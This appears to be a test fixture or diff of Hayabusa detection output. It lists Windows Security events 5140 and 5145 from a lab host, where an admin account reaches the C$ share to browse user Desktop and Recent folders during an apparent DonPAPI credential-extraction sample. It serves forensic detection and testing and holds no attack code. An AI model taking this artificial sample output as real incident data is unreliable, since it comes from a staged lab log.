+2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.736 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.848 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
